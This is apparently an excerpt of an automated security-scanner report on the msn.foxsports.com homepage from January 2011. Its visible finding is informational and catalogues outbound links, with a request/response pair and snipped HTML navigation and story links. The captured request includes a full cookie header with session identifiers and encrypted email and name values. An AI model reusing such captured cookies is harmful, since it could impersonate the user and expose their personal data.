                           LeBron has been especially lethal away from Miami.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/shows/inside-call?vid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/other/page/fox-flash?vid=8d71ff62-ef59-430a-8b81-55b13aeb12f5&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=8d71ff62-ef59-430a-8b81-55b13aeb12f5&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG">
   
       
                   <a href="http://foxsports.seenon.com/?v=fox-sports_nfl&amp;ecid=PRF-SM-510004&amp;PA=FOXNFLSideline_300X100"><img src="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG" alt="" border="0" />
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG">
   
       
                   <a href="http://www.ticketsnow.com/NFL-Football-Tickets/NFL-Playoff-Tickets.html?partnerCode=foxnfl "><img src="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG" alt="" border="0" />
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.3. http://msn.foxsports.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?fb_xd_fragment HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://msn.foxsports.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: _chartbeat2=oxy92bi233plhtq3; NetInsightSessionID=1; _gig_mig=1; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pRME=; pExternalUser=; pLMD="2011-01-08 00:30:34"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; pUID=/k94ON71KoD/EYqOMDzIDg==; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; MUID=65AFF4B77A124856A6B4337A160FA285
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Sat, 08 Jan 2011 01:06:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 295348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/js/vp.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<h3><a href="http://www.foxsportsbracket.com/" title="VOTE: TOP MOMENT" >VOTE: TOP MOMENT</a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too">
RB Clay, too
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too"></a>
...[SNIP]...



    <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all">Turns out Panthers have no Luck at all</a>
...[SNIP]...



            <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all"></a>
...[SNIP]...



    <a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot">QB Pryor has surgery on foot</a>
...[SNIP]...



            <a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot"></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU">
TCU billboard takes shot at OSU
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU"></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportssouthwest.com/01/05/11/The-case-for-and-against-Jason-Garrett/landing_cowboys.html?blockID=385478&amp;feedID=4679" title="Good hire?">
Good hire?
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportssouthwest.com/01/05/11/The-case-for-and-against-Jason-Garrett/landing_cowboys.html?blockID=385478&amp;feedID=4679" title="Good hire?"></a>
...[SNIP]...
<div class="subhead Rumors"><a href="http://www.yardbarker.com"><img src="/component/photo/BroughtToYouByYardbarker">
...[SNIP]...
<h3><a title="Are Seahawks fans getting ripped off at the concession stand?" href="http://network.yardbarker.com/all_sports/article_external/is_the_seahawks_12th_man_getting_ripped_off/3926828">Are Seahawks fans getting ripped off at the concession stand?</a>
...[SNIP]...
<h3><a title="&#8216;Homeless Radio Voice Guy&#8217; story shows the best and worst of internet age journalism" href="http://network.yardbarker.com/mlb/article_external/homeless_radio_voice_guy_story_shows_us_the_best_and_worst_of_journalism_in_the_age_of_the_internet/3926527">&#8216;Homeless Radio Voice Guy&#8217; story shows the best and worst of internet age journalism</a>
...[SNIP]...
<h3><a title="Can Elway return Denver to the glory days?" href="http://network.yardbarker.com/nfl/article_external/can_john_elway_return_denver_to_their_days_of_glory/3926452">Can Elway return Denver to the glory days?</a>
...[SNIP]...
<div class="foot"><a title="MORE RUMORS" class="more" href="http://www.yardbarker.com/rumors">MORE RUMORS&nbsp;&raquo;</a>
...[SNIP]...
<td class="fs-promo-card-image" width="65">
                   <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd"><img alt="Gridiron Dynasty" border="0" src="/component/photo/Gridiron_Dynasty_65x48" />
...[SNIP]...
<strong><a href="http://www.whatifsports.com/x.asp?r=678106&u=gd">Gridiron Dynasty</a>
...[SNIP]...
<div>
                           <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd" target="_blank">PLAY NOW</a>
...[SNIP]...
<div class="body">
